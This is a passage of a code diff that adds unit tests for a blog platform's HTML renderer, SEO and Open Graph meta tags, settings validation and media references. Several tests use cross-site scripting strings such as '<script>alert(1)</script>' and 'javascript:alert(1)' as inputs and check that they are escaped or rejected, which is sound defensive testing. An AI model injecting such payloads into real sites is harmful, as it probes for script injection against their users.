+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: "22222222-2222-2222-2222-222222222222"
+        }
+      ]
+    });
+    expect(html).not.toContain("video-news-thumbnail");
+    expect(html).toContain(
+      '<iframe src="https://www.youtube-nocookie.com/embed/dQw4w9WgXcQ"'
+    );
+  });
+
+  test("Issue #639: skips a video_news block with an unsupported provider or malformed videoId (defense-in-depth — write-time validation should already reject these)", () => {
+    expect(
+      renderContentJsonToHtml({
+        blocks: [
+          { type: "video_news", provider: "vimeo", videoId: "dQw4w9WgXcQ" }
+        ]
+      })
+    ).toBe("");
+    expect(
+      renderContentJsonToHtml({
+        blocks: [{ type: "video_news", provider: "youtube", videoId: "bad-id" }]
+      })
+    ).toBe("");
+  });
+
+  test("Issue #639: never renders a raw iframe/script from stored content — only its own fixed embed markup", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          title: '"><script>alert(1)</script>'
+        }
+      ]
+    });
+    expect(html).not.toContain("<script");
+    expect(html).toContain("&lt;script&gt;");
+  });
+});
+
+describe("collectRenderableVideoNewsThumbnailMediaObjectIds (Issue #639)", () => {
+  test("empty for content with no video_news blocks", () => {
+    expect(
+      collectRenderableVideoNewsThumbnailMediaObjectIds({
+        blocks: [{ type: "paragraph", text: "hi" }]
+      })
+    ).toEqual([]);
+  });
+
+  test("collects thumbnailMediaObjectId, ignoring blocks without one", () => {
+    const ids = collectRenderableVideoNewsThumbnailMediaObjectIds({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: "11111111-1111-1111-1111-111111111111"
+        },
+        { type: "video_news", provider: "youtube", videoId: "dQw4w9WgXcR" }
+      ]
+    });
+    expect(ids).toEqual(["11111111-1111-1111-1111-111111111111"]);
+  });
+});
+
+describe("collectRenderableGalleryMediaObjectIds (Issue #636)", () => {
+  test("empty for content with no gallery blocks", () => {
+    expect(
+      collectRenderableGalleryMediaObjectIds({
+        blocks: [{ type: "paragraph", text: "hi" }]
+      })
+    ).toEqual([]);
+  });
+
+  test("collects mediaObjectId from image items only, ignoring video items and url-based items", () => {
+    const ids = collectRenderableGalleryMediaObjectIds({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              mediaObjectId: "11111111-1111-1111-1111-111111111111"
+            },
+            { mediaType: "video", mediaObjectId: "should-be-ignored" },
+            { mediaType: "image", url: "https://cdn.example.com/a.jpg" }
+          ]
+        }
+      ]
+    });
+    expect(ids).toEqual(["11111111-1111-1111-1111-111111111111"]);
+  });
+
+  test("deduplicates repeated mediaObjectId references across blocks", () => {
+    const ids = collectRenderableGalleryMediaObjectIds({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              mediaObjectId: "11111111-1111-1111-1111-111111111111"
+            }
+          ]
+        },
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              mediaObjectId: "11111111-1111-1111-1111-111111111111"
+            }
+          ]
+        }
+      ]
+    });
+    expect(ids).toEqual(["11111111-1111-1111-1111-111111111111"]);
+  });
+});
+
+describe("resolveSeoTitle", () => {
+  test("prefers seoTitle when present", () => {
+    expect(
+      resolveSeoTitle({ seoTitle: "SEO Title", title: "Post Title" })
+    ).toBe("SEO Title");
+  });
+
+  test("falls back to title when seoTitle is null/empty", () => {
+    expect(resolveSeoTitle({ seoTitle: null, title: "Post Title" })).toBe(
+      "Post Title"
+    );
+    expect(resolveSeoTitle({ seoTitle: "  ", title: "Post Title" })).toBe(
+      "Post Title"
+    );
+  });
+});
+
+describe("resolveMetaDescription", () => {
+  test("prefers metaDescription, then excerpt, then a generated summary", () => {
+    expect(
+      resolveMetaDescription({
+        metaDescription: "Meta desc",
+        excerpt: "Excerpt",
+        contentText: "Body text"
+      })
+    ).toBe("Meta desc");
+
+    expect(
+      resolveMetaDescription({
+        metaDescription: null,
+        excerpt: "Excerpt",
+        contentText: "Body text"
+      })
+    ).toBe("Excerpt");
+
+    expect(
+      resolveMetaDescription({
+        metaDescription: null,
+        excerpt: null,
+        contentText: "Body text here."
+      })
+    ).toBe("Body text here.");
+  });
+
+  test("truncates a long generated summary at a word boundary with an ellipsis", () => {
+    const longText = "word ".repeat(50).trim();
+    const description = resolveMetaDescription({
+      metaDescription: null,
+      excerpt: null,
+      contentText: longText
+    });
+    expect(description.length).toBeLessThanOrEqual(164);
+    expect(description.endsWith("...")).toBe(true);
+  });
+});
+
+describe("resolveCanonicalUrl", () => {
+  test("uses the post's canonicalUrl when it is a safe absolute URL", () => {
+    const url = resolveCanonicalUrl(
+      { canonicalUrl: "https://example.com/custom" },
+      "https://example.com/blog/acme/self"
+    );
+    expect(url).toBe("https://example.com/custom");
+  });
+
+  test("falls back to selfUrl when canonicalUrl is null", () => {
+    const url = resolveCanonicalUrl(
+      { canonicalUrl: null },
+      "https://example.com/blog/acme/self"
+    );
+    expect(url).toBe("https://example.com/blog/acme/self");
+  });
+
+  test("ignores an unsafe canonicalUrl (javascript:) and falls back to selfUrl", () => {
+    const url = resolveCanonicalUrl(
+      { canonicalUrl: "javascript:alert(1)" },
+      "https://example.com/blog/acme/self"
+    );
+    expect(url).toBe("https://example.com/blog/acme/self");
+  });
+
+  test("returns null when neither canonicalUrl nor selfUrl is safe", () => {
+    const url = resolveCanonicalUrl({ canonicalUrl: null }, "not-a-url");
+    expect(url).toBeNull();
+  });
+});
+
+describe("renderPublicPageShell", () => {
+  test("escapes title/description and includes a canonical link when present", () => {
+    const html = renderPublicPageShell({
+      title: "<script>alert(1)</script>",
+      description: "desc",
+      canonicalUrl: "https://example.com/post",
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(html).toContain("&lt;script&gt;alert(1)&lt;/script&gt;");
+    expect(html).not.toContain("<script>alert(1)</script>");
+    expect(html).toContain(
+      '<link rel="canonical" href="https://example.com/post" />'
+    );
+    expect(html).toContain('<html lang="en">');
+  });
+
+  test("omits the canonical link entirely when canonicalUrl is null", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(html).not.toContain('rel="canonical"');
+  });
+
+  test("Issue #636: omits og:image/twitter:image entirely when ogImageUrl is null/absent", () => {
+    const withoutOption = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(withoutOption).not.toContain("og:image");
+    expect(withoutOption).not.toContain("twitter:image");
+
+    const withNull = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      ogImageUrl: null
+    });
+    expect(withNull).not.toContain("og:image");
+  });
+
+  test("Issue #636: emits escaped og:image/twitter:image tags when ogImageUrl is present", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      ogImageUrl: "https://media.example.test/a.jpg?x=1&y=2",
+      ogImageAlt: "A <b>photo</b>"
+    });
+    expect(html).toContain(
+      '<meta property="og:image" content="https://media.example.test/a.jpg?x=1&amp;y=2" />'
+    );
+    expect(html).toContain(
+      '<meta name="twitter:card" content="summary_large_image" />'
+    );
+    expect(html).toContain(
+      '<meta name="twitter:image" content="https://media.example.test/a.jpg?x=1&amp;y=2" />'
+    );
+    expect(html).toContain(
+      '<meta property="og:image:alt" content="A &lt;b&gt;photo&lt;/b&gt;" />'
+    );
+  });
+
+  test("Issue #636: omits og:image:alt when ogImageAlt is not provided", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      ogImageUrl: "https://media.example.test/a.jpg"
+    });
+    expect(html).toContain('<meta property="og:image"');
+    expect(html).not.toContain("og:image:alt");
+  });
+
+  test("Issue #642: emits escaped og:title/og:description/twitter:title/twitter:description derived from title/description", () => {
+    const html = renderPublicPageShell({
+      title: "<b>Title</b>",
+      description: "<i>desc</i>",
+      canonicalUrl: "https://example.com/post",
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(html).toContain(
+      '<meta property="og:title" content="&lt;b&gt;Title&lt;/b&gt;" />'
+    );
+    expect(html).toContain(
+      '<meta property="og:description" content="&lt;i&gt;desc&lt;/i&gt;" />'
+    );
+    expect(html).toContain(
+      '<meta name="twitter:title" content="&lt;b&gt;Title&lt;/b&gt;" />'
+    );
+    expect(html).toContain(
+      '<meta name="twitter:description" content="&lt;i&gt;desc&lt;/i&gt;" />'
+    );
+    expect(html).toContain(
+      '<meta property="og:url" content="https://example.com/post" />'
+    );
+  });
+
+  test("Issue #642: omits og:url when canonicalUrl is null", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(html).not.toContain("og:url");
+  });
+
+  test("Issue #642: emits twitter:card=summary (not summary_large_image) when there is no og:image", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(html).toContain('<meta name="twitter:card" content="summary" />');
+  });
+
+  test("Issue #642: emits og:site_name only when siteName is provided", () => {
+    const withSiteName = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      siteName: "Acme <News>"
+    });
+    expect(withSiteName).toContain(
+      '<meta property="og:site_name" content="Acme &lt;News&gt;" />'
+    );
+
+    const withoutSiteName = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(withoutSiteName).not.toContain("og:site_name");
+  });
+});
+
+describe("resolveOgImageUrl (Issue #636)", () => {
+  test("null when there is no resolved featured media URL", () => {
+    expect(resolveOgImageUrl(null)).toBeNull();
+  });
+
+  test("passes through a safe absolute http(s) URL", () => {
+    expect(resolveOgImageUrl("https://media.example.test/a.jpg")).toBe(
+      "https://media.example.test/a.jpg"
+    );
+  });
+
+  test("null for an unsafe URL (defense-in-depth even though the registry's publicUrl is already trusted)", () => {
+    expect(resolveOgImageUrl("javascript:alert(1)")).toBeNull();
+  });
+});
+
+describe("resolveRobotsMetaContent (Issue #649)", () => {
+  test("public visibility gets index,follow,max-image-preview:large", () => {
+    expect(resolveRobotsMetaContent("public")).toBe(
+      "index,follow,max-image-preview:large"
+    );
+  });
+
+  test("unlisted visibility gets noindex,nofollow", () => {
+    expect(resolveRobotsMetaContent("unlisted")).toBe("noindex,nofollow");
+  });
+
+  test("private visibility gets noindex,nofollow (never actually reached by a real route, defense-in-depth)", () => {
+    expect(resolveRobotsMetaContent("private")).toBe("noindex,nofollow");
+  });
+});
+
+describe("resolveOgLocale (Issue #649)", () => {
+  test("maps id -> id_ID and en -> en_US", () => {
+    expect(resolveOgLocale("id")).toBe("id_ID");
+    expect(resolveOgLocale("en")).toBe("en_US");
+  });
+
+  test("passes through an already-formatted xx_XX value unchanged", () => {
+    expect(resolveOgLocale("fr_FR")).toBe("fr_FR");
+  });
+
+  test("falls back to the raw locale for an unknown short code", () => {
+    expect(resolveOgLocale("zz")).toBe("zz");
+  });
+});
+
+describe("deriveArticleSectionAndTags (Issue #649)", () => {
+  test("first category term becomes section, tag terms become tags", () => {
+    const result = deriveArticleSectionAndTags([
+      { taxonomyType: "tag", name: "breaking" },
+      { taxonomyType: "category", name: "Politics" },
+      { taxonomyType: "category", name: "World" },
+      { taxonomyType: "tag", name: "election" }
+    ]);
+    expect(result.section).toBe("Politics");
+    expect(result.tags).toEqual(["breaking", "election"]);
+  });
+
+  test("no category term: section is null", () => {
+    const result = deriveArticleSectionAndTags([
+      { taxonomyType: "tag", name: "breaking" }
+    ]);
+    expect(result.section).toBeNull();
+    expect(result.tags).toEqual(["breaking"]);
+  });
+
+  test("empty terms: section null, tags empty", () => {
+    expect(deriveArticleSectionAndTags([])).toEqual({
+      section: null,
+      tags: []
+    });
+  });
+});
+
+describe("renderPublicPageShell — Issue #649 extensions", () => {
+  test("og:locale is always rendered, derived from the shell's own locale field", () => {
+    const idHtml = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "id"
+    });
+    expect(idHtml).toContain('<meta property="og:locale" content="id_ID" />');
+
+    const enHtml = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(enHtml).toContain('<meta property="og:locale" content="en_US" />');
+  });
+
+  test("og:type, article:published_time/modified_time/section/tag rendered only when ogType is article", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: "https://example.com/post",
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      ogType: "article",
+      articlePublishedTime: "2026-01-01T00:00:00.000Z",
+      articleModifiedTime: "2026-01-02T00:00:00.000Z",
+      articleSection: "Politics",
+      articleTags: ["breaking", "<script>"]
+    });
+
+    expect(html).toContain('<meta property="og:type" content="article" />');
+    expect(html).toContain(
+      '<meta property="article:published_time" content="2026-01-01T00:00:00.000Z" />'
+    );
+    expect(html).toContain(
+      '<meta property="article:modified_time" content="2026-01-02T00:00:00.000Z" />'
+    );
+    expect(html).toContain(
+      '<meta property="article:section" content="Politics" />'
+    );
+    expect(html).toContain(
+      '<meta property="article:tag" content="breaking" />'
+    );
+    expect(html).toContain(
+      '<meta property="article:tag" content="&lt;script&gt;" />'
+    );
+    expect(html).not.toContain("<script>");
+  });
+
+  test("article:* tags omitted entirely when ogType is not article (list/category/tag/search pages, byte-identical to before this issue)", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      articleSection: "Politics",
+      articleTags: ["breaking"]
+    });
+
+    expect(html).not.toContain("og:type");
+    expect(html).not.toContain("article:section");
+    expect(html).not.toContain("article:tag");
+  });
+
+  test("og:image:type/width/height/secure_url and twitter:image:alt rendered alongside og:image", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      ogImageUrl: "https://media.example.test/a.jpg",
+      ogImageAlt: "A photo",
+      ogImageMimeType: "image/jpeg",
+      ogImageWidth: 1200,
+      ogImageHeight: 630
+    });
+
+    expect(html).toContain(
+      '<meta property="og:image:secure_url" content="https://media.example.test/a.jpg" />'
+    );
+    expect(html).toContain(
+      '<meta property="og:image:type" content="image/jpeg" />'
+    );
+    expect(html).toContain('<meta property="og:image:width" content="1200" />');
+    expect(html).toContain('<meta property="og:image:height" content="630" />');
+    expect(html).toContain(
+      '<meta name="twitter:image:alt" content="A photo" />'
+    );
+  });
+
+  test("no og:image:type/width/height/secure_url/twitter:image:alt when there is no og:image", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+
+    expect(html).not.toContain("og:image:secure_url");
+    expect(html).not.toContain("og:image:type");
+    expect(html).not.toContain("og:image:width");
+    expect(html).not.toContain("twitter:image:alt");
+  });
+
+  test("robots meta rendered only when robotsContent is provided", () => {
+    const withRobots = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      robotsContent: "index,follow,max-image-preview:large"
+    });
+    expect(withRobots).toContain(
+      '<meta name="robots" content="index,follow,max-image-preview:large" />'
+    );
+
+    const withoutRobots = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(withoutRobots).not.toContain("robots");
+  });
+
+  test("structuredDataJsonLd is serialized into a safe <script> tag, escaping </script> break-out attempts", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en",
+      structuredDataJsonLd: {
+        "@type": "NewsArticle",
+        headline: "</script><script>alert(1)</script>"
+      }
+    });
+
+    expect(html).toContain('<script type="application/ld+json">');
+    expect(html).not.toContain("</script><script>alert(1)</script>");
+    expect(html).toContain("\\u003c/script>");
+  });
+
+  test("no structured data script when structuredDataJsonLd is omitted/null", () => {
+    const html = renderPublicPageShell({
+      title: "Title",
+      description: "desc",
+      canonicalUrl: null,
+      bodyHtml: "<p>body</p>",
+      locale: "en"
+    });
+    expect(html).not.toContain("application/ld+json");
+  });
+});
+
+describe("renderPostSummaryListHtml", () => {
+  test("renders an empty-state message when there are no posts", () => {
+    const html = renderPostSummaryListHtml("acme", [], "Nothing here.");
+    expect(html).toBe("<p>Nothing here.</p>");
+  });
+
+  test("renders a link per post, escaped", () => {
+    const html = renderPostSummaryListHtml(
+      "acme",
+      [{ title: "<b>Hi</b>", slug: "hi", excerpt: null }],
+      "empty"
+    );
+    expect(html).toContain('href="/blog/acme/hi"');
+    expect(html).toContain("&lt;b&gt;Hi&lt;/b&gt;");
+  });
+});
+
+describe("renderPaginationNavHtml", () => {
+  test("shows only Next on page 1 with more pages", () => {
+    const html = renderPaginationNavHtml(1, true, "/blog/acme");
+    expect(html).toContain("Next");
+    expect(html).not.toContain("Previous");
+  });
+
+  test("shows only Previous on the last page", () => {
+    const html = renderPaginationNavHtml(2, false, "/blog/acme");
+    expect(html).toContain("Previous");
+    expect(html).not.toContain("Next");
+  });
+});

--- a/tests/blog-settings-policy.test.ts
+++ b/tests/blog-settings-policy.test.ts
@@ -1,0 +1,92 @@
+/**
+ * Unit tests for `blog-settings-policy.ts`'s `contentQualityChecklistPolicy`
+ * field (Issue #640). Scoped only to the field this issue added — the rest
+ * of `validateUpdateBlogSettingsInput` (blogTitle, postsPerPage, etc., Issue
+ * #543) has no pre-existing test file and is out of this issue's atomic
+ * scope to retrofit.
+ */
+import { describe, expect, test } from "bun:test";
+
+import { validateUpdateBlogSettingsInput } from "../src/modules/blog-content/domain/blog-settings-policy";
+
+describe("validateUpdateBlogSettingsInput — contentQualityChecklistPolicy (Issue #640)", () => {
+  test("undefined is left untouched (partial update)", () => {
+    const result = validateUpdateBlogSettingsInput({});
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.contentQualityChecklistPolicy).toBeUndefined();
+    }
+  });
+
+  test("accepts a valid override map for overridable rule ids", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: {
+        excerpt_present: "blocking",
+        featured_image_alt_text: "info"
+      }
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.contentQualityChecklistPolicy).toEqual({
+        excerpt_present: "blocking",
+        featured_image_alt_text: "info"
+      });
+    }
+  });
+
+  test("accepts an empty object (clearing all overrides)", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: {}
+    });
+    expect(result.valid).toBe(true);
+  });
+
+  test("rejects a security rule id (unsafe_html_rejected) — never accepted, not even silently ignored", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: { unsafe_html_rejected: "info" }
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(
+        result.errors.some((e) => e.field === "contentQualityChecklistPolicy")
+      ).toBe(true);
+    }
+  });
+
+  test("rejects a security rule id (no_local_image_path)", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: { no_local_image_path: "warning" }
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an unknown rule id", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: { not_a_real_rule: "warning" }
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an invalid severity value", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: { excerpt_present: "critical" }
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a non-object value", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: "not-an-object"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an array value", () => {
+    const result = validateUpdateBlogSettingsInput({
+      contentQualityChecklistPolicy: ["excerpt_present"]
+    });
+    expect(result.valid).toBe(false);
+  });
+});

--- a/tests/content-block-media-references.test.ts
+++ b/tests/content-block-media-references.test.ts
@@ -1,0 +1,261 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  collectGalleryImageReferences,
+  collectVideoNewsThumbnailReferences
+} from "../src/modules/blog-content/domain/content-block-media-references";
+
+const VALID_ID = "11111111-1111-1111-1111-111111111111";
+const VALID_ID_2 = "22222222-2222-2222-2222-222222222222";
+
+describe("collectGalleryImageReferences (Issue #636)", () => {
+  test("empty for content with no blocks/gallery blocks", () => {
+    expect(collectGalleryImageReferences({})).toEqual({
+      mediaObjectIds: [],
+      violations: []
+    });
+    expect(
+      collectGalleryImageReferences({
+        blocks: [{ type: "paragraph", text: "hi" }]
+      })
+    ).toEqual({ mediaObjectIds: [], violations: [] });
+  });
+
+  test("collects a well-formed mediaObjectId from an image gallery item", () => {
+    const result = collectGalleryImageReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [{ mediaType: "image", mediaObjectId: VALID_ID }]
+        }
+      ]
+    });
+    expect(result).toEqual({ mediaObjectIds: [VALID_ID], violations: [] });
+  });
+
+  test("deduplicates the same mediaObjectId referenced multiple times", () => {
+    const result = collectGalleryImageReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            { mediaType: "image", mediaObjectId: VALID_ID },
+            { mediaType: "image", mediaObjectId: VALID_ID }
+          ]
+        }
+      ]
+    });
+    expect(result.mediaObjectIds).toEqual([VALID_ID]);
+  });
+
+  test('flags a raw url on an image item as a violation, in full-online R2-only mode ("raw_url_not_allowed")', () => {
+    const result = collectGalleryImageReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [{ mediaType: "image", url: "https://cdn.example.com/a.jpg" }]
+        }
+      ]
+    });
+    expect(result.mediaObjectIds).toEqual([]);
+    expect(result.violations).toEqual([
+      {
+        itemIndex: 0,
+        reason: "raw_url_not_allowed",
+        rawUrl: "https://cdn.example.com/a.jpg"
+      }
+    ]);
+  });
+
+  test("flags a missing mediaObjectId on an image item", () => {
+    const result = collectGalleryImageReferences({
+      blocks: [{ type: "gallery", items: [{ mediaType: "image" }] }]
+    });
+    expect(result.violations).toEqual([
+      { itemIndex: 0, reason: "media_object_id_missing_or_malformed" }
+    ]);
+  });
+
+  test("flags a malformed (non-UUID) mediaObjectId", () => {
+    const result = collectGalleryImageReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [{ mediaType: "image", mediaObjectId: "not-a-uuid" }]
+        }
+      ]
+    });
+    expect(result.violations).toEqual([
+      { itemIndex: 0, reason: "media_object_id_missing_or_malformed" }
+    ]);
+  });
+
+  test("ignores video items entirely (Issue #639's scope, not #636)", () => {
+    const result = collectGalleryImageReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            { mediaType: "video", url: "https://cdn.example.com/a.mp4" },
+            { mediaType: "video" }
+          ]
+        }
+      ]
+    });
+    expect(result).toEqual({ mediaObjectIds: [], violations: [] });
+  });
+
+  test("reports the correct itemIndex per violation across multiple items", () => {
+    const result = collectGalleryImageReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            { mediaType: "image", mediaObjectId: VALID_ID },
+            { mediaType: "image", url: "https://cdn.example.com/a.jpg" },
+            { mediaType: "image" },
+            { mediaType: "image", mediaObjectId: VALID_ID_2 }
+          ]
+        }
+      ]
+    });
+    expect(result.mediaObjectIds.sort()).toEqual([VALID_ID, VALID_ID_2].sort());
+    expect(result.violations).toEqual([
+      {
+        itemIndex: 1,
+        reason: "raw_url_not_allowed",
+        rawUrl: "https://cdn.example.com/a.jpg"
+      },
+      { itemIndex: 2, reason: "media_object_id_missing_or_malformed" }
+    ]);
+  });
+
+  test("tolerates malformed contentJson shapes (non-array blocks, non-array items) without throwing", () => {
+    expect(collectGalleryImageReferences({ blocks: "nope" })).toEqual({
+      mediaObjectIds: [],
+      violations: []
+    });
+    expect(
+      collectGalleryImageReferences({
+        blocks: [{ type: "gallery", items: "nope" }]
+      })
+    ).toEqual({ mediaObjectIds: [], violations: [] });
+  });
+});
+
+describe("collectVideoNewsThumbnailReferences (Issue #639)", () => {
+  test("empty for content with no blocks/video_news blocks", () => {
+    expect(collectVideoNewsThumbnailReferences({})).toEqual({
+      mediaObjectIds: [],
+      violations: []
+    });
+    expect(
+      collectVideoNewsThumbnailReferences({
+        blocks: [{ type: "paragraph", text: "hi" }]
+      })
+    ).toEqual({ mediaObjectIds: [], violations: [] });
+  });
+
+  test("a video_news block with NO thumbnailMediaObjectId is not a violation (custom thumbnail is optional)", () => {
+    const result = collectVideoNewsThumbnailReferences({
+      blocks: [
+        { type: "video_news", provider: "youtube", videoId: "dQw4w9WgXcQ" }
+      ]
+    });
+    expect(result).toEqual({ mediaObjectIds: [], violations: [] });
+  });
+
+  test("collects a well-formed thumbnailMediaObjectId", () => {
+    const result = collectVideoNewsThumbnailReferences({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: VALID_ID
+        }
+      ]
+    });
+    expect(result).toEqual({ mediaObjectIds: [VALID_ID], violations: [] });
+  });
+
+  test("deduplicates the same thumbnailMediaObjectId referenced by multiple blocks", () => {
+    const result = collectVideoNewsThumbnailReferences({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: VALID_ID
+        },
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcR",
+          thumbnailMediaObjectId: VALID_ID
+        }
+      ]
+    });
+    expect(result.mediaObjectIds).toEqual([VALID_ID]);
+  });
+
+  test("flags a malformed (non-UUID) thumbnailMediaObjectId", () => {
+    const result = collectVideoNewsThumbnailReferences({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: "not-a-uuid"
+        }
+      ]
+    });
+    expect(result.mediaObjectIds).toEqual([]);
+    expect(result.violations).toEqual([
+      { blockIndex: 0, reason: "media_object_id_malformed" }
+    ]);
+  });
+
+  test("ignores gallery/other block types entirely", () => {
+    const result = collectVideoNewsThumbnailReferences({
+      blocks: [
+        {
+          type: "gallery",
+          items: [{ mediaType: "image", mediaObjectId: VALID_ID }]
+        }
+      ]
+    });
+    expect(result).toEqual({ mediaObjectIds: [], violations: [] });
+  });
+
+  test("reports the correct blockIndex per violation across multiple blocks", () => {
+    const result = collectVideoNewsThumbnailReferences({
+      blocks: [
+        { type: "paragraph", text: "intro" },
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: "not-a-uuid"
+        },
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcR",
+          thumbnailMediaObjectId: VALID_ID_2
+        }
+      ]
+    });
+    expect(result.mediaObjectIds).toEqual([VALID_ID_2]);
+    expect(result.violations).toEqual([
+      { blockIndex: 1, reason: "media_object_id_malformed" }
+    ]);
+  });
+
+  test("tolerates malformed contentJson shapes (non-array blocks) without throwing", () => {
+    expect(collectVideoNewsThumbnailReferences({ blocks: "nope" })).toEqual({
+      mediaObjectIds: [],
+      violations: []
+    });
+  });
+});

--- a/tests/content-quality-checklist-gate.test.ts
+++ b/tests/content-quality-checklist-gate.test.ts
@@ -1,0 +1,268 @@
+/**
+ * Unit tests for `content-quality-checklist-gate.ts` (Issue #640) — the
+ * application-layer orchestration between the pure evaluator and a
+ * `NewsMediaPort`. Uses a fake in-memory `NewsMediaPort` (same technique
+ * `news-media-port.ts`'s own header describes: any function taking a
+ * `NewsMediaPort` parameter can be unit-tested without a real database by
+ * injecting a fake), so no DATABASE_URL/Postgres is needed — `tx` is never
+ * actually dereferenced by the fake, only forwarded.
+ */
+import { describe, expect, test } from "bun:test";
+
+import { evaluateContentQualityChecklistForContent } from "../src/modules/blog-content/application/content-quality-checklist-gate";
+import type {
+  NewsMediaPort,
+  ResolvedNewsMediaReferenceDTO
+} from "../src/modules/_shared/ports/news-media-port";
+
+const FEATURED_ID = "11111111-1111-1111-1111-111111111111";
+const GALLERY_ID = "22222222-2222-2222-2222-222222222222";
+
+function fakePort(options: {
+  modeActive: boolean;
+  resolvable?: Record<string, ResolvedNewsMediaReferenceDTO>;
+}): NewsMediaPort {
+  const resolvable = options.resolvable ?? {};
+
+  return {
+    async isFullOnlineR2ModeActiveForTenant() {
+      return options.modeActive;
+    },
+    async isMediaReferenceSafe(_tx, _tenantId, mediaObjectId) {
+      return mediaObjectId in resolvable;
+    },
+    async resolveMediaReferences(_tx, _tenantId, mediaObjectIds) {
+      const map = new Map<string, ResolvedNewsMediaReferenceDTO>();
+      for (const id of mediaObjectIds) {
+        if (resolvable[id]) {
+          map.set(id, resolvable[id]);
+        }
+      }
+      return map;
+    },
+    resolveMediaPublicBaseUrl() {
+      return "";
+    }
+  };
+}
+
+const FAKE_TX = {} as Bun.SQL;
+
+const BASE_CONTENT = {
